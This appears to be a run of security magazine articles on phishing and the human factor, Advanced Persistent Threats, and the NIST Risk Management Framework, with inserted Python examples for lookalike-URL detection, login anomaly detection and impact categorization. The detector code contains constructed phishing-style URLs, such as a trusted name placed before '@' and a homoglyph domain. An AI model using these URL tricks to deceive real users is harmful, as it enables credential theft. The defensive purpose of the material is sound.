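The URL bullet above warns that a malicious site’s domain may differ from the legitimate one only by a spelling variation or a different domain. As an added example (not code from the article), the following Python flags such lookalike URLs against a constructed allow-list of trusted domains; TRUSTED_DOMAINS, TWO_LABEL_SUFFIXES and the sample URLs are assumptions:<br />

```python
"""Flag phishing-style lookalike URLs against an allow-list of trusted domains.

Constructed example: TRUSTED_DOMAINS, TWO_LABEL_SUFFIXES and the sample URLs
below are assumptions, not values from the article.
"""
import ipaddress
from urllib.parse import urlsplit

# Registered domains the organization owns or trusts (constructed allow-list).
TRUSTED_DOMAINS = {"examplebank.com", "pentestmag.com"}

# Public suffixes made of two labels; production code would use the full
# Public Suffix List instead of this short constructed set.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.in"}

# Character sequences that imitate letters in lookalike domains, applied
# longest-first so that "rn" -> "m" happens before "1" -> "l".
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"),
               ("3", "e"), ("5", "s"), ("7", "t"), ("8", "b")]


def normalize(label: str) -> str:
    """Replace confusable sequences with the letters they imitate (heuristic)."""
    for fake, real in CONFUSABLES:
        label = label.replace(fake, real)
    return label


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two labels; 1 or 2 against a brand suggests a typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registered_domain(host: str) -> str:
    """Return the registrable part of a host, e.g. 'examplebank.com' or 'bank.co.uk'."""
    labels = host.split(".")
    take = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-take:])


def classify(url: str) -> tuple:
    """Return (verdict, reason); verdict is 'trusted', 'lookalike', 'suspicious' or 'unknown'."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    # user:pass@host syntax lets a trusted name appear before the real host.
    if "@" in parts.netloc:
        return "suspicious", "credentials before '@' hide the real host"
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return "suspicious", "no host in URL"
    try:
        ipaddress.ip_address(host)
        return "suspicious", "IP literal instead of a domain name"
    except ValueError:
        pass
    reg = registered_domain(host)
    if reg in TRUSTED_DOMAINS:
        return "trusted", reg
    if "." not in reg:
        return "unknown", reg
    # A trusted name used as a subdomain of an unrelated registered domain.
    subdomains = host[: len(host) - len(reg)].rstrip(".")
    for trusted in TRUSTED_DOMAINS:
        if ("." + trusted + ".") in ("." + subdomains + "."):
            return "lookalike", f"{trusted} embedded as a subdomain of {reg}"
    brand, suffix = reg.split(".", 1)
    for trusted in sorted(TRUSTED_DOMAINS):
        t_brand, t_suffix = trusted.split(".", 1)
        if brand == t_brand and suffix != t_suffix:
            return "lookalike", f"{t_brand} brand under a different suffix .{suffix}"
        if normalize(brand) == t_brand:
            return "lookalike", f"homoglyph of {trusted}"
        if levenshtein(brand, t_brand) <= 2:
            return "lookalike", f"typosquat of {trusted}"
    return "unknown", reg


if __name__ == "__main__":
    # Constructed sample URLs of the kind seen in phishing e-mails.
    for sample in ["https://www.examplebank.com/login",
                   "https://www.examp1ebank.com/login",
                   "http://examplebank.com.account-verify.example/",
                   "http://examplebank.com@198.51.100.7/",
                   "https://examplebank.net/",
                   "https://exampelbank.com/",
                   "https://example.org/"]:
        verdict, reason = classify(sample)
        print(f"{verdict:10} {sample}  ({reason})")
```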
Conclusions<br />
Through this article we can understand that, however secure your application is, it is always vulnerable to one thing: the Human Factor. This human factor is the weakest link in security, and it can be patched not by one-time training but only by an ongoing process of improvement. Many times it is the interaction between the data and the person that has to be secured, rather than the interaction between the data and the server.<br />
DINESH SHETTY<br />
Dinesh Shetty is an Information Security Consultant at one of the leading security organizations in India. He is an EC-Council Certified Ethical Hacker and an IBM certified AppScan Specialist. He has authored five articles on technology subjects which have been published in multiple InfoSec magazines and international journals to date. He has found flaws in leading Web and Mobile based Financial applications and helped the organizations solve the vulnerabilities before they could be exploited. Passion for research is what drives him and he works till late mornings every day to fulfill his quest for knowledge.<br />
When Computer Attacks don’t always happen to others: Advanced Persistent Threats<br />
There is a new type of cyber threat that is catching more victims every day; many people know it is called Advanced Persistent Threats, and there is a trail of high-profile victims out there to give us enough.<br />
But before taking any action we have to bring awareness to what this new kind of threat means: the only way to be protected is to understand what it means for organizations and how it could impact their business. Undoubtedly, exceptional circumstances call for exceptional actions. So, maybe it is time to acknowledge that computer attacks do not always happen to others; we need to become aware and to be prepared in advance to minimize our risk exposure to this kind of attack, protecting both our organizations and their leaders.<br />
Even if you are not an expert in Information Security, you can infer that in order to attack different targets such as the UN (United Nations); Colombia’s Administrative Department of Security (DAS, for its Spanish acronym); Guayaquil City Hall’s website; the personal data of thousands of Ecuadorian policemen; Latin American political leaders’ Twitter and Facebook accounts; and similar targets in Europe or in the US, significant know-how and coordination levels are required. And all of this calls for resources that exceed the possibilities of enthusiastic university (or college) hackers.<br />
Furthermore, Internet-disclosed threats about future attacks on new public and private companies’ sites in the short run should act as a wake-up call to understand that we are facing an unprecedented type of motivation.<br />
Please note that although Advanced Persistent Threats are the type of attacks perpetrated by some<br />
social action and cyber-terrorism groups worldwide (of proven reach in Latin America), rather than categorizing their perpetrators from the philosophical and political standpoints, we should take the threats seriously and become aware that the globalization of knowledge and information puts these techniques within reach of anyone with enough motivation and time to deploy them.<br />
The Murder of Ego (…and some other myths<br />
as well)<br />
So, this kind of attack presents the three main aspects of a crime: motive, means and opportunity. There is not much we can do to influence the first one, but we do have plenty of things to do with respect to the remaining two… needless to say, a crime is not feasible if any one of these three aspects is missing!<br />
In the first place we must destroy the myth held by those who so far have not experienced a massive computer attack. To them information security is not a priority, or (in the worst case scenario) it is simply not a significant issue. Maybe this is a wound to the ego of many security administrators. But let’s face it: we’d better be moved by a whitepaper that enables us to be prepared and to prevent, rather than suffer a large-scale attack with serious consequences.<br />
As a professional, without a doubt this is one of the worst arguments I could possibly hear from those who are responsible for IT service infrastructure management, because (just to mention one reason) they ignore the main feature of these next-generation attacks: their sneakiness!<br />
15 years ago, when a virus infected a PC, the<br />
worst threat would be the deletion of all hard-disk<br />
stored data; then, with the massiveness of Local Area<br />
Networks first, and of the Internet later, viruses had the<br />
possibility to accelerate their dissemination and erase<br />
the hard disks of more PCs, something really very<br />
uncomfortable.<br />
Nonetheless, we still had an advantage because we<br />
certainly knew when the infection had taken place; and<br />
once the PC had been reinstalled, infection would be<br />
over.<br />
Today things are very different: the first goal of globally-distributed threats is to avoid generating the kind of disasters made in the past; their main goal is to remain undercover! Staying underground pays off better than hard disk deletions, because it enables ongoing and surreptitious digital crime perpetration for a while longer.<br />
An Opportunity To Prevent From Being In The<br />
Middle Of An Attack<br />
With respect to means and opportunity, we will further<br />
provide detailed technical issues regarding APT attacks.<br />
However, bear in mind the following key items:<br />
• There is no exploit without a vulnerability. Every attack is based on vulnerabilities (i.e. actual chances of executing a threat); although there are some topological or protocol matters that are very hard (sometimes impossible) to avoid, in most cases we find that vulnerabilities, whether in applications, operating systems or configurations, are predictable and therefore preventable.<br />
• Closely related to the item above, many of the vulnerabilities in question find their source in deficiencies (or worse, the nonexistence) of a process to assure early detection, remediation and verification. So, to say it as clearly as we possibly can with a real-life example: some organizations have documented and implemented processes to request new office supplies where up to three levels of approval are required, yet they have done nothing when it comes to checking an application’s security code before its clearance for production.<br />
Ultimately, this is basically a matter of not facilitating<br />
the means to become an easy target for computer<br />
attacks when we could prevent them.<br />
There is nothing we can do to prevent the existence<br />
of people with the necessary know-how and motivation<br />
to produce this kind of attacks. But there are many other<br />
things we can do:<br />
• Do everything within our reach to stay away from<br />
attackers, or at least attempt to discourage them<br />
by turning attacks into something so difficult to<br />
accomplish that time investment will not pay off.<br />
• Protect our information assets in such a way that, although a hacker may access them, he won’t be able to use them (something similar to the systems installed in high-end vehicles: those cars do not require an alarm, because although you can open them, without the electronic key the car won’t start!).<br />
Ok Now, What Do We Mean When We Say<br />
Advanced Persistent Threat (APT) Attack?<br />
Let’s deconstruct the three aspects involved in this<br />
name to have a thorough idea of what we are facing.<br />
Advanced<br />
I assume you are scared to death when people use the word advanced to refer to an attack! Well, you are right to be scared.<br />
The reason this word is included in the description of APTs is that this type of attack uses different techniques to reach its targets; they are considered advanced for the fact that attackers have different techniques at hand and are not limited to a specific issue (as happens, for example, with application attacks).<br />
Some of the techniques used in global scale APT<br />
attacks are the following:<br />
• DDoS (distributed denial of service) attacks<br />
• Botnets<br />
• Phishing<br />
• Social Engineering<br />
• SPAM<br />
• Fraudulent applications in social networks<br />
• Vulnerability Analysis<br />
• Rootkits<br />
• Exploitation of application vulnerabilities<br />
In addition to this, we could say that the performance and execution of this kind of technique requires the interaction of more than one person; in fact it is almost impossible for individuals to carry out these attacks, not only because of the skills required but because of the time and resources involved.<br />
Persistent<br />
Within the Information Security Community, and mainly amongst hacking technique experts, there is a belief that no matter how many protective measures you implement, targets will always be potentially vulnerable given enough time and motivation. Unfortunately this has proven to be true in most cases.<br />
In fact, when we say that these attacks are persistent we mean that they focus on a given target, using different techniques until reaching their goal.<br />
Usually when computer attacks are addressed from a<br />
business standpoint, it is very common to say that it has<br />
to do with a large scale businesses; in other words that<br />
the ultimate goal is to launch a massive threat that will<br />
only hit on a restricted number of victims, though this is<br />
more than enough to have a return on investment and<br />
profit.<br />
Threat<br />
Use of different techniques and coordination of multiple<br />
resources to achieve a goal, tell us about a very strong<br />
motivation: APT attacks share a feature in common;<br />
all individuals involved in the attack are determined to<br />
accomplish their objective.<br />
A threat is the possibility of materializing a risk; if we<br />
think about a group of organized people, with resources<br />
at hand, the necessary skills to use those resources and<br />
the determination to insist on the attack, it is clear that<br />
the hacking maxim mentioned before gains a renewed<br />
meaning!<br />
What Is Hidden In The Name: If All The Aforesaid<br />
Had Not Worried You …<br />
It’s important to bear in mind that this kind of attack is also based on unknown techniques, i.e. vulnerabilities or exploits not massively diffused or announced, since the perpetrators of these attacks have the necessary time and skills to develop them.<br />
This is a key reason why these kinds of attacks are different from the rest. While traditional attacks pursue simple targets (based on a cost-effective ratio between the effort to compromise them and the financial gain), APT attackers are willing to do everything to accomplish their goal, even if it implies the development of some new kind of threat.<br />
The use of unknown threats and new kinds of attacks brings added value for APTs, something attackers are really looking for; this makes their early detection more difficult! As we said, these attacks are characterized by their sneakiness; the purpose here is to keep the threat inactive or acting undetectably, stealing information, for example by extending the time during which it stays effective: the longer these techniques (used to permeate information and make use of the threat) remain anonymous, the better for attackers.<br />
Digital Identity And Brand… Weren’t They<br />
“Intangible”?<br />
If there is something Advanced Persistent Threats have made possible, it is the fact that they have turned some kinds of assets usually referred to as intangibles into something concrete. Of course, the Marketing & Finance areas have always known quite well the (monetary) value of a brand (both for a company and for a line of specific products). Nonetheless many IT Departments have not handled the same business parameters to value and protect these assets.<br />
However, from the attack that infringed the security of a renowned consumer goods brand and modified the contents of a recipe where those products were used, up to more complex issues where very expensive Intellectual Property infringements took place, the threats referred to in this whitepaper show the high degree of exposure of a company’s most significant assets (in fact many authors agree that the brand is the most valuable asset).<br />
Technology and Security Area Managers should pay much attention to this issue. If their objective is to add value to the business and become strategic business areas for the organization, the fact of the company investing lots of money in advertising and social action campaigns to raise the value of a brand, and then having this value affected by computer attacks, would not only jeopardize the organization’s confidence in these areas; it might as well be seen as a weakness.<br />
Conclusion<br />
We shall review next some key items at the time of<br />
evaluating our protection against APT attacks; once<br />
again do not consider this as a thorough list, since<br />
we may find many other information sources with<br />
different and highly useful recommendations. Though<br />
I do strongly recommend considering all these<br />
aspects and analyzing how each one applies to the<br />
organization.<br />
Risk Analysis: Imminent Realization!<br />
In general, the best way to understand what proactive<br />
measures are required to reduce exposure degree,<br />
and therefore threatening risks for organizations is to<br />
perform a risk analysis.<br />
However, please note that I am referring to quantitative risk analyses, made in a wide-awake and thorough manner, including all the organization’s information assets, i.e. the kind of interdisciplinary analysis that should not be made by the IT area alone, but in which all the organization’s areas should necessarily be involved. These kinds of analyses typically require an external vendor’s assistance, with a team of experts who contribute their skills, experience and qualified human resources to accelerate information gathering and classification.<br />
I believe every organization should implement this kind<br />
of analysis, and at least should update them on a yearly<br />
basis. This is something stated by several international<br />
standards for many years now (ISO 17779, ISO 27001,<br />
BS 7799) as well as for the methodologies that support<br />
this task (MAGERIT, COBIT).<br />
Lack of analyses to assess an organization’s assets<br />
and exposure risks has several impacts on IT and<br />
Information Security strategic planning, though it hits as<br />
well everyday matters, i.e. investment rationale!<br />
Ghosts do Exist<br />
I have tried to reinforce the secret characteristic of APT<br />
attacks. This is something that should make us think<br />
that chances of having our organization’s components<br />
infected are very high (or are on their way to being<br />
infected).<br />
In fact, many experts go a bit further and propose<br />
working based on a specific assumption; that their<br />
organization has already been infected. So they<br />
suggest working as from there. I must confess that I<br />
agree with this approach!<br />
Assuming that the company has been infected by some kind of silent threat does not mean checking that you have the latest antivirus version in place or reviewing the list of open ports at the firewall; this is an in-depth insight and self-awareness process in which all the technological aspects, processes and human resources of the organization should be involved.<br />
Controlling Is Not The Same As Prohibiting<br />
Many organizations have decided to limit (or directly<br />
prohibit) access to social networks, messaging, and a<br />
growing number of websites and applications to their<br />
employees; in most cases this is the plain result of<br />
categorizing these sites as dangerous, and in the best<br />
case scenario reveals a deep unawareness of how<br />
social networks and individuals work.<br />
It’s been widely proven that any ban triggers a<br />
countermeasure: if users want to access a forbidden<br />
site they will certainly find a way to do it, and most<br />
likely new problems will arise while they try.<br />
Some organizations, following a risk analysis, make<br />
a quantitative decision to prohibit one or several<br />
applications based on a tangible business risk. Well,<br />
those organizations are on the right path; however,<br />
they represent a minimal share of the aggregate,<br />
and those who have really made it usually opt to forbid<br />
the least possible number of sites.<br />
Before prohibiting, organizations should first evaluate<br />
the benefits of controlling the use of these<br />
potentially hazardous applications; social networks are<br />
growing sources of revenue, in addition to being<br />
relatively low-cost and widespread promotion channels!<br />
Many companies have people devoted to managing<br />
promotion and sales channels in social networks.<br />
If companies are going to increasingly use this kind<br />
of communication channel as an alternative to the<br />
traditional ones, maybe the wisest thing to do would be<br />
to recognize those potential benefits and opportunities<br />
and encourage a controlled use that minimizes risks, rather<br />
than trying to prohibit something that sooner or later, in<br />
one way or another, we will have to allow, by then without<br />
the skill and experience we would have gained had we<br />
allowed it from the very beginning.<br />
On the other hand, the fact of prohibiting something<br />
makes us feel we don’t have to worry about it anymore,<br />
something that may turn into a double-edged sword!<br />
Although Devices Are Not Company-owned, They<br />
May Still Hold Company Information<br />
Some years ago it was very easy to draw an imaginary line<br />
between the organization and the outer world (the perimeter)<br />
and focus our protection efforts on safeguarding the<br />
traffic through this line. The guiding principle of this<br />
approach was that everything inside the line belonged<br />
to the company and therefore had to be protected, while<br />
everything on the other side of the line belonged to the<br />
outer world and was the source of any threat.<br />
Even though we should have abandoned that myth several<br />
years ago, given statistics showing that above<br />
70% of attacks perpetrated against an organization<br />
had their source on the intranet (i.e. the inner side of<br />
the perimeter), over the last years we have seen that<br />
line blur at high speed: first due to the expansion of<br />
telework, followed by Business-to-Business interconnections,<br />
and more recently the coup de grâce<br />
(finishing blow) fostered by the increasing adoption of<br />
Cloud Computing.<br />
Well then, in addition to everything known and<br />
mentioned in this paper, a new kind of threat is knocking<br />
on our doors, and we’d better take it into account: let’s<br />
welcome smartphones, PDAs, tablets and the like!<br />
These devices, which in most cases are not the property of<br />
the organization, usually have access to email and other<br />
systems, and hold the organization’s critical information,<br />
which is not only outside the organization’s boundaries but<br />
travelling who knows where, without any kind of<br />
security control whatsoever.<br />
Page 33 http://pentestmag.com
If we have made an in-depth risk analysis (sorry if I<br />
insist), we should know that even when these devices<br />
are not company-owned, we still need to include them<br />
in the strategic security plan; to say it clearly: wherever<br />
there is company valuable information, there are no<br />
excuses for not protecting it.<br />
Illegal Software, Dual Problem<br />
Unfortunately, it is true that many people use illegal<br />
software as a protection method!<br />
Besides being logically nonsensical, this entails a severe<br />
risk, since there are many documented threats hidden in<br />
fake antivirus software and other allegedly anti-malware<br />
products; not to mention the infection rates of illegal<br />
software, usually downloaded from sites specialized in<br />
these matters.<br />
We are all responsible for bringing awareness both to<br />
companies and individuals; similarly we are accountable<br />
for pursuing the necessary know-how to understand this<br />
world we live in and decrease risk exposure.<br />
Keep One’s Eyes On The Ball<br />
Many of the APT-type attacks have been aimed at<br />
accessing and exposing an organization’s sensitive<br />
information.<br />
In some cases, information disclosed was not that<br />
valuable per se; but the discredit caused by such a<br />
disclosure was!<br />
What would happen if we could protect information in<br />
such a way that, even when accessed by an attacker, it<br />
could not be used? Well, that’s what I mean when<br />
I say we should keep our eyes on the ball!<br />
Some experts recommend the use of different encryption<br />
techniques (more or less complex, and focused on<br />
different devices) as a way to reduce the degree of<br />
information exposure.<br />
Even if information could be accessed and<br />
extracted from the organization, decryption would be<br />
such a complex process that it would take hundreds<br />
or thousands of years using latest-generation<br />
computers, thus making its practical use impossible.<br />
This clearly raises many other challenges of a technical<br />
nature, e.g. the custody of digital certificates; though if we<br />
consider that we still have the chance to apply much simpler<br />
techniques, such as file encryption and<br />
database encryption for applications, just to mention a<br />
few, this kind of risk mitigation technique could have<br />
its rightful place in the near future of information<br />
security.<br />
Give Him An Inch And He Will Take A Mile<br />
Stuxnet, Operation Shady RAT and the attacks against<br />
the International Olympic Committee and the World<br />
Anti-Doping Agency (reportedly hidden and active for at<br />
least 5 years), among many others, are clear<br />
examples of what could happen, but they are not decisive<br />
when it comes to analyzing the future; all we can be<br />
sure of is that we do not know what new threats will appear.<br />
However, we’ve got so much to do before giving up;<br />
some people even say that this is a war and that we can<br />
win it; I believe it’s too soon to say that, though without<br />
a doubt there’s plenty of room for improvement in most<br />
companies’ and public agencies’ information security<br />
management systems.<br />
There is one point on which many experts agree:<br />
that new attacks call for new monitoring, detection and<br />
prevention techniques; however, these techniques do<br />
exist; the problem is just that they are not used widely<br />
enough.<br />
Just to give you an example: the SIEM (Security<br />
Information and Event Management) notion is<br />
practically unknown to, or only partially implemented by,<br />
many organizations, which thus miss the opportunity to have<br />
at least integrated monitoring systems that enable threat<br />
detection from a behavioral standpoint, supplementing<br />
pattern detection systems and other heuristic techniques;<br />
an added value of this kind of system is that it provides<br />
audit trails, very useful for minimizing impact in the event<br />
of an attack!<br />
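The kind of monitoring the paragraph above describes, as an added example that is not code from the article: a signature-style rule and a behavioral rule run over authentication events, with each alert carrying the correlated events that produced it as its audit trail. The log format, rule names, thresholds and all events are constructed assumptions.

```python
"""Pattern detection supplemented by behavioral detection over auth events.
Added example; log format, rules, thresholds and events are constructed."""
from collections import Counter, defaultdict
from datetime import datetime
import re

# Constructed line format: "<iso-timestamp> user=<u> src=<ip> result=<success|fail>"
LINE = re.compile(r"(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\S+)")


def parse(lines):
    """Strict parser: malformed lines are dropped rather than guessed at."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.fromisoformat(e["ts"])
        events.append(e)
    return events


def pattern_rule(events, threshold=3):
    """Signature-style rule: `threshold` failures from one source on one
    account followed by a success from that same source. The alert keeps
    the failures plus the success as its audit trail."""
    alerts = []
    failures = defaultdict(list)            # (user, src) -> pending failures
    for e in events:
        key = (e["user"], e["src"])
        if e["result"] == "fail":
            failures[key].append(e)
        elif e["result"] == "success":
            if len(failures[key]) >= threshold:
                alerts.append({"rule": "bruteforce-then-success", "user": e["user"],
                               "src": e["src"], "trail": failures[key] + [e]})
            failures[key] = []
    return alerts


def baseline(events):
    """Per-user histogram of the hours at which successful logins happened."""
    hours = defaultdict(Counter)
    for e in events:
        if e["result"] == "success":
            hours[e["user"]][e["ts"].hour] += 1
    return hours


def behaviour_rule(baseline_hours, events, min_history=5):
    """Behavioral rule: a success at an hour the user has never logged in at.
    Users without enough history have no baseline and are not judged."""
    alerts = []
    for e in events:
        hist = baseline_hours.get(e["user"])
        if e["result"] != "success" or not hist or sum(hist.values()) < min_history:
            continue
        if hist[e["ts"].hour] == 0:
            alerts.append({"rule": "off-hours-login", "user": e["user"],
                           "src": e["src"], "trail": [e]})
    return alerts


# Constructed history: alice always logs in around 09:00, bob around 10:00.
HISTORY = (
    [f"2011-11-0{d}T09:0{d}:00 user=alice src=10.0.0.5 result=success" for d in range(1, 6)]
    + [f"2011-11-0{d}T10:1{d}:00 user=bob src=10.0.0.6 result=success" for d in range(1, 6)]
)
# Constructed events for the day under review.
TODAY = [
    "2011-11-08T02:13:44 user=alice src=10.0.0.5 result=success",   # her machine, but 02:13
    "2011-11-08T10:00:01 user=bob src=198.51.100.7 result=fail",
    "2011-11-08T10:00:05 user=bob src=198.51.100.7 result=fail",
    "2011-11-08T10:00:09 user=bob src=198.51.100.7 result=fail",
    "2011-11-08T10:00:20 user=bob src=198.51.100.7 result=success",  # usual hour, new source
    "2011-11-08T11:30:00 user=carol src=10.0.0.9 result=success",    # no baseline: not judged
]


def run(history=HISTORY, today=TODAY):
    """Both detection layers over the same events; pattern alerts first."""
    hist_events, new_events = parse(history), parse(today)
    return pattern_rule(new_events) + behaviour_rule(baseline(hist_events), new_events)


if __name__ == "__main__":
    for alert in run():
        print(alert["rule"], alert["user"], alert["src"], "events:", len(alert["trail"]))
```

Only the behavioral layer notices alice, and only the pattern layer notices bob; each alone would have missed one of the two.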
GABRIEL MARCOS<br />
Twitter: @jarvel<br />
An Introduction<br />
to the NIST Risk Management Framework<br />
This article will introduce the NIST Risk Management Framework.<br />
It will cover the steps of system categorization, the selection of<br />
security controls, the implementation of the selected controls,<br />
the assessment of control implementation, and the system<br />
authorization process.<br />
Creating an effective information security<br />
program can be a daunting task. If you are<br />
lucky, you work for a company with an existing<br />
security program, clearly defined security mandates,<br />
and support from senior management. But, what do<br />
you do if you are given the task of creating a security<br />
program for your organization? This article will guide<br />
you through the process of creating an effective security<br />
program using the NIST risk management framework.<br />
Even if you are not directly responsible for creating a<br />
security program, you may find it helpful to understand<br />
how security programs are created and why certain<br />
items are prioritized by auditors.<br />
It seems like information security is in the news on<br />
a daily basis. We’ve all seen the news stories about<br />
companies that have been breached. The motives for<br />
the breaches may range from financial gain, industrial<br />
espionage, revenge against a perceived injustice,<br />
or the political goals of terrorists. In response to the<br />
many breaches, new laws are being passed mandating<br />
protection of certain types of information. Even if your<br />
organization is not directly impacted by new statutes,<br />
your organization may be forced to create an information<br />
security program to comply with customer requirements<br />
or in response to a security incident.<br />
External forces requiring the creation of a security<br />
program are not enough to ensure a successful program;<br />
you need the support and commitment of senior<br />
SOLUTIONS<br />
management for your efforts to succeed. If management<br />
is being forced to create a security program, they may<br />
resent the requirement and provide minimal support.<br />
It is quite possible the first challenge you may face is<br />
overcoming the resistance of management.<br />
Management usually focuses on increasing<br />
revenues and reducing costs. It is only natural for<br />
them to view an information security program as an<br />
added cost and a productivity barrier to the business.<br />
If you are able to demonstrate how a security program<br />
can not only meet your compliance requirements but<br />
also add value to the business, you will gain more support<br />
for your efforts.<br />
Your first task is to understand the goals of the<br />
organization. Once you understand the organizational<br />
goals, it is helpful to frame communications with<br />
management in the terms important to them. Security<br />
is usually discussed in terms of confidentiality, integrity,<br />
and availability, often referred to as the CIA triad.<br />
Improved integrity can reduce the costs associated<br />
with rework and correction. Improved availability can<br />
increase revenues and improve customer satisfaction.<br />
Improved confidentiality can protect your intellectual<br />
property. An information security program can<br />
also improve operational consistency as part of an<br />
organizational risk management program.<br />
After obtaining the support of senior management,<br />
a security standard should be chosen. There are<br />
several security standards in widespread use.<br />
The most common standards are ISO27001,<br />
COBIT, and NIST. The International Organization<br />
for Standardization (ISO) [1] and the International<br />
Electrotechnical Commission (IEC) [2] created the<br />
ISO27001 [3] standard. This global standard is used<br />
heavily in Europe. The Information Systems Audit<br />
and Control Association (ISACA) [4] created the<br />
Control Objectives for Information and related Technology<br />
(COBIT) [5], which is widely used for compliance with<br />
the US Sarbanes Oxley Act (SOX) requirements for<br />
US publicly traded companies. The National Institute<br />
of Standards and Technology (NIST) has developed a<br />
series of standards that are published at the Computer<br />
Security Resource Center [6]. The NIST standards<br />
are widely used by US government agencies. This<br />
article will discuss using the NIST Risk Management<br />
Framework, but the basic steps also apply to the other<br />
frameworks.<br />
After selecting a security framework, the system<br />
boundaries and information assets should be identified.<br />
It is easy to overlook information that is not contained<br />
in the computer systems such as paper forms. All<br />
information should be considered, even items not<br />
directly covered by regulations. For example, if your<br />
organization is a health care company, it would be<br />
easy to focus solely on the patient health information<br />
but overlook the employee payroll information, the<br />
customer billing data, or the integrity of the financial<br />
systems.<br />
Once the information assets have been identified,<br />
you need to determine the business unit that owns the<br />
information resource. Meetings should be scheduled<br />
with the senior manager in charge of the unit so you<br />
can perform a business impact analysis (BIA). A<br />
business impact analysis will attempt to estimate the<br />
mission impact of failure to meet the security objectives<br />
of confidentiality, integrity, and availability. NIST Federal<br />
Information Processing Standards Publication 199<br />
(NIST FIPS Pub 199 [7]) recommends classifying<br />
systems into the categories of Low, Medium, and High<br />
impact.<br />
A system is considered low impact if the loss of<br />
confidentiality, integrity, or availability has a limited<br />
adverse effect on the organization. The system is<br />
considered medium impact if the loss of confidentiality,<br />
integrity, or availability has a severe impact on the<br />
organization. The system is considered high impact if<br />
the loss of confidentiality, integrity, or availability would<br />
have a catastrophic effect on the organization. When<br />
evaluating a system, you should consider confidentiality,<br />
integrity, and availability separately. The overall score of<br />
the asset is the highest rating of the three categories.<br />
A rating of not applicable should not be used since<br />
each system should have a low water mark of business<br />
impact.<br />
As an example, let’s consider a public facing<br />
webserver for a movie theater that advertises the<br />
currently showing films and show times. The information<br />
on the website is expected to be publicly available so the<br />
business impact for disclosure is considered low. Since<br />
the website is frequently updated with new movies and<br />
show schedules, website defacement or inaccurate<br />
information would be quickly corrected and result in a<br />
low business impact for integrity. Since many patrons<br />
of the movie theater check the website for movies<br />
and schedules when considering attending the movie,<br />
a loss of availability for several weeks could have a<br />
catastrophic impact on the business resulting in a rating<br />
of high impact for availability. The highest score of the<br />
confidentiality, integrity, and availability categories is<br />
high so the overall score of the system is high.<br />
It is important when characterizing the impact level<br />
of the systems to evaluate both user data as well<br />
as system data. System information could include<br />
password files, encryption keys and certificates,<br />
authenticated sessions, etc. Instead of focusing<br />
entirely on the individual system, the system should<br />
be evaluated in the context of the overall enterprise.<br />
For example, a low impact system could be used<br />
to compromise a higher impact system if network<br />
segmentation and firewall rules allow an attacker to<br />
pivot in the network or provide other resources for an<br />
attacker. The preliminary categorization of the system<br />
should be adjusted to reflect any legal or contractual<br />
obligations, the organizational environment,<br />
organizational mission and goals, and data sharing<br />
requirements.<br />
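The categorization steps above, as an added example that is not code from the article: per-objective ratings are the highest rating of any information type the system holds, the overall rating is the high-water mark of the three objectives, "not applicable" is rejected, and a review flags a lower-rated system sharing a network segment with a higher-rated one (the pivot case the text describes). The `segment` attribute, the pivot review and both sample systems are assumptions; the theater website follows the article's own worked example.

```python
"""FIPS 199 style security categorization with an enterprise-context review.
Added example; the segment attribute, pivot review and sample systems are
constructed for illustration."""
from dataclasses import dataclass

LEVELS = {"low": 1, "medium": 2, "high": 3}   # the article's Low/Medium/High scale
OBJECTIVES = ("confidentiality", "integrity", "availability")


@dataclass(frozen=True)
class InfoType:
    """One kind of information a system holds (user data, or system data such
    as password files and keys), rated separately for each objective."""
    name: str
    confidentiality: str
    integrity: str
    availability: str

    def rating(self, objective):
        value = getattr(self, objective).lower()
        if value not in LEVELS:
            # Per the article, "not applicable" must not be used: every system
            # carries at least a Low water mark of business impact.
            raise ValueError(f"{self.name}/{objective}: {value!r} must be one of {sorted(LEVELS)}")
        return value


@dataclass(frozen=True)
class System:
    name: str
    info_types: tuple
    segment: str   # assumed attribute: the network segment the system sits on


def highest(levels):
    """High-water mark of a collection of impact levels."""
    return max(levels, key=LEVELS.__getitem__)


def categorize(system):
    """Per-objective rating = highest rating of any information type for that
    objective; overall rating = highest of the three objectives."""
    per_objective = {obj: highest(t.rating(obj) for t in system.info_types)
                     for obj in OBJECTIVES}
    return {**per_objective, "overall": highest(per_objective.values())}


def pivot_review(systems):
    """Enterprise-context check: systems rated below another system on the
    same segment are candidates to pivot from, so their preliminary
    categorization should be revisited. Returns tuples of
    (system, its level, segment, highest level on that segment)."""
    by_segment = {}
    for s in systems:
        by_segment.setdefault(s.segment, []).append(s)
    findings = []
    for segment, members in by_segment.items():
        levels = {m.name: categorize(m)["overall"] for m in members}
        top = highest(levels.values())
        findings += [(name, level, segment, top)
                     for name, level in levels.items() if LEVELS[level] < LEVELS[top]]
    return findings


# Constructed systems. The theater website follows the article's example:
# public data (low C), quickly corrected defacements (low I), weeks of
# downtime would be catastrophic (high A), so the overall rating is High.
THEATER_SITE = System("theater-website",
                      (InfoType("films-and-showtimes", "low", "low", "high"),),
                      segment="dmz")
# A lobby signage kiosk on the same segment, rated Low on everything.
SIGNAGE_KIOSK = System("signage-kiosk",
                       (InfoType("lobby-slideshow", "low", "low", "low"),),
                       segment="dmz")

if __name__ == "__main__":
    for s in (THEATER_SITE, SIGNAGE_KIOSK):
        print(s.name, categorize(s))
    print(pivot_review([THEATER_SITE, SIGNAGE_KIOSK]))
```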
The information obtained through the system<br />
characterization will be used for several activities<br />
in the development of a security program. Business<br />
continuity and disaster recovery planning activity needs<br />
the business impact analysis (BIA) to determine the<br />
maximum tolerable downtime (MTD) used to establish<br />
the recovery time objectives (RTO). Enterprise risk<br />
management needs the BIA to identify resources<br />
that need to be protected during the enterprise risk<br />
assessment process. Capital planning needs the<br />
BIA to properly allocate resources when budgeting.<br />
Enterprise architects and system designers need<br />
the BIA to align technical initiatives with business<br />
priorities. Vendor management processes need a BIA<br />
to define data protection requirements when sharing<br />
